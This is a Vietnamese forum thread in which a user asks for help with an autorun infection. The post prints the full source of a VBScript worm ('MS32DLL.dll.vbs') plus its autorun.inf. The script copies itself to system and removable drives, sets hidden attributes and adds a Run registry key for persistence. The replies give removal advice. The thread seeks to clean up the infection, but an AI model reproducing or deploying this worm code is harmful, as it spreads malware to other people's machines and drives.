Lỗi không nghiêm trọng nhưng cực kì khó chịu.

Cả 3 partition của em đều bị tình trạng là khi double-click vào là nó chỉ autoplay, cái file autorun.inf có nội dung như sau:

Mã:

[autorun]
  shellexecute=wscript.exe MS32DLL.dll.vbs

Em đã ráng sửa lại cho chỉ còn lại [autorun] (đã thử cách sửa cho file khác autoplay), save lại, đặt thuộc tính read-only, vậy mà cỡ 30s sau quay trở lại thì file đó vẫn y chang nội dung cũ. Đã cố gắng xóa nó mà nó vẫn trở lại với nội dung như trên. Còn cái file ms32dll.dll.vbs cũng đã cố tìm mọi cách xóa mà nó vẫn trở lại. Cái file đó khi em mở ra bằng notepad thì nó có nội dung như sau:

Mã:

'My name is Slow but sure V0.05
  on error resume next
  dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
  atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
  set fs = createobject("Scripting.FileSystemObject")
  set mf = fs.getfile(Wscript.ScriptFullname)
  dim text,size
  size = mf.size
  check = mf.drive.drivetype
  set text=mf.openastextstream(1,-2)
  do while not text.atendofstream
  mysource=mysource&text.readline
  mysource=mysource & vbcrlf
  loop
  do
  Set winpath = fs.getspecialfolder(0)
  set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
  tf.attributes = 32
  set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
  tf.write mysource
  tf.close
  set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
  tf.attributes = 39
  for each flashdrive in fs.drives
  If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
  set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
  tf.attributes =32
  set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
  tf.write mysource
  tf.close
  set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
  tf.attributes =39
  set tf =fs.getfile(flashdrive.path &"\autorun.inf")
  tf.attributes = 32
  set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
  tf.write atr
  tf.close
  set tf =fs.getfile(flashdrive.path &"\autorun.inf")
  tf.attributes=39
  end if
  next
  set rg = createobject("WScript.Shell")
  rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
  rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla"
  rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
  if check <> 1 then
  Wscript.sleep 200000
  end if
  loop while check<>1
  set sd = createobject("Wscript.shell")
  sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Em đã ghost lại win, quét virus,… nhưng vẫn bị như vậy.
Bây giờ em muốn nó trở lại là khi double-click vào nó Open chứ không phải Autoplay, nhờ ae amtech giúp đỡ. Vô cùng biết ơn….

[attach]7439[/attach]

 

nó là virus đó. Bạn quét virus nhưng ko diệt được triệt để thôi. Thử cách của mình:
1. Tắt system restore
2. Cài và cập nhật bitdefender <~ mình chỉ dùng quen thằng này thôi. Xong cho nó quét ngya lập tức hay ko thì tùy.
3. Khởi động máy lại, ko mở bất kì thứ gì lên trước, chỉ mở console của bitdefender lên thôi, mở task manager và kill hết nhưng ứng dụng ko cần thiết kể cả explorer.
4. Cho nó quét full system.
Nếu ko mở được taskmanager thì cần phải thay đổi regedit 1 tí, bác nào có đoạn đó thì đưa ra giúp nha.

 

Nếu ko cài bitdefender, thì có thể cài chương trình Avast (bản Home thì free nhưng cho phép update online luôn :d cool) và trong lúc install chọn chức năng scan toàn bộ máy tính ngay sau khi restart máy.

 

đầu tiên là phải endtask cái process đang chạy của cái script đó roài hãy delete file đi...Sau đó tìm những phần auto start with windows của mấy cái script đó roài disable đi

 

cách đơn giản nhất với mấy con virus auto run là ra dos xóa hết ^^

 

trời, bro chưa thấy cái process của script đó nó lì cỡ nào đâu, end một cái là nó ra cái mới ngay lập tức, làm sao delete cho kịp.
lúc vào task manager, một tay cầm chuột, tay kia bàn phím, ráng bấm thiệt nhanh để delete nó nhưng không tài nào delete kịp. lúc đó tức điên người luôn:mad:
cách bro chỉ em đã làm trước khi post bài lên rồi, nhưng dù sao cũng thanks bro nhiều :kiss:

 

Gỡ tạm HDD vác qua máy khác quét virus xem sao >> mang về rùi boot Safe Mode >> coi cái nào startup tầm bậy thì dẹp nó

 

đa số mấy con virus này chỉ nằm ở thu mục gốc mỗi ổ đĩa
dùng boot hiren vào NC rồi xóa hết là xong
bị mấy lần toàn làm như vậy hà ^^

 

cảm ơn ý kiến của tất cả mấy bro, em đã làm theo bro TH307 => tụi nó đã qua đời.